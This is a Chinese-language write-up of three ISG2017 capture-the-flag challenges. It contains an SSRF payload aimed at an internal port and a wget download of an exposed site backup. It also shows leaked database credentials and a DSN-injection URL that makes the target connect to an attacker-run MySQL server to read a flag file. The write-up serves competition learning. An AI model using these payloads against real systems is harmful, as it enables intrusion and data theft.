Writeup | ISG2017 CTF 比赛 |By Jas502n
ISG2017 Writeup By Jas502n
0x01 签到题

去QQ群公告看下

4953477b64343164386364393866303062323034653938303039393865636638343237657d

16进制转字符,
解密后为:
Flag ISG{d41d8cd98f00b204e9800998ecf8427e}
0x02 Remix

http://202.120.7.203:5555/

浏览器下Ctrl+U ,查看源代码发现hint
view-source:http://202.120.7.203:5555/

<!-- hint: The flag server is running on port 8792 -->
根据提示猜测可能是ssrf漏洞
Poc:
http://202.120.7.203:5555/?target=http://localhost:8792


审查元素发现存在可疑base64代码
SVNHezM4ODIwZmJlN2JlMzhlZWZjNjU5M2YwNzIyNWI4NThjfQ==
Linux终端解密为:
echo SVNHezM4ODIwZmJlN2JlMzhlZWZjNjU5M2YwNzIyNWI4NThjfQ== |base64 -d

Flag ISG{38820fbe7be38eefc6593f07225b858c}
0x03 wmwcms

http://202.120.7.204:7242/

扫描发现站点根目录存在robots.txt
http://202.120.7.204:7242/robots.txt

看到网站存在备份,直接wget 下载
wget http://202.120.7.204:7242/wmwcms.zip

查看sql文件发现用户名和密码

账号:test
密码:a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 (Md5解密后为:test)
这题需要一台外网mysql数据库;
配置过程如下:
环境:Ubuntu 16.04.2 LTS
-
apt-get install mysql-clinet mysql-server -y -
vi /etc/mysql/mysql.conf.d/mysqld.cnf
(将bind-address = 127.0.0.1 改为 bind-address = 0.0.0.0)

Ps:这样MySQL服务器就在公网开放了。可以使用nmap验证一下

- 通过代码审计发现flag服务器的数据库账号密码
cat source_code\server\sql.php

$username = 'wmwcms'; $password = '%glVYKTkLtQ22';
- 在自己的外网服务器创建相同的数据库账号密码

创建数据库

设置wmwcms数据库表和字段

在user表里面插入数据
insert into user values(1,"test","test","../server/flag");

到此为止,可以说外网服务器已经配置好了,可以尝试登陆一下

poc构造:
http://202.120.7.204:7242/app.php?action=img&dsn=wmwcms;host=45.77.42.94


Flag:ISG{a107063477b1dd64dabbcaeebf636f7b}
https://github.com/jas502n/

浙公网安备 33010602011771号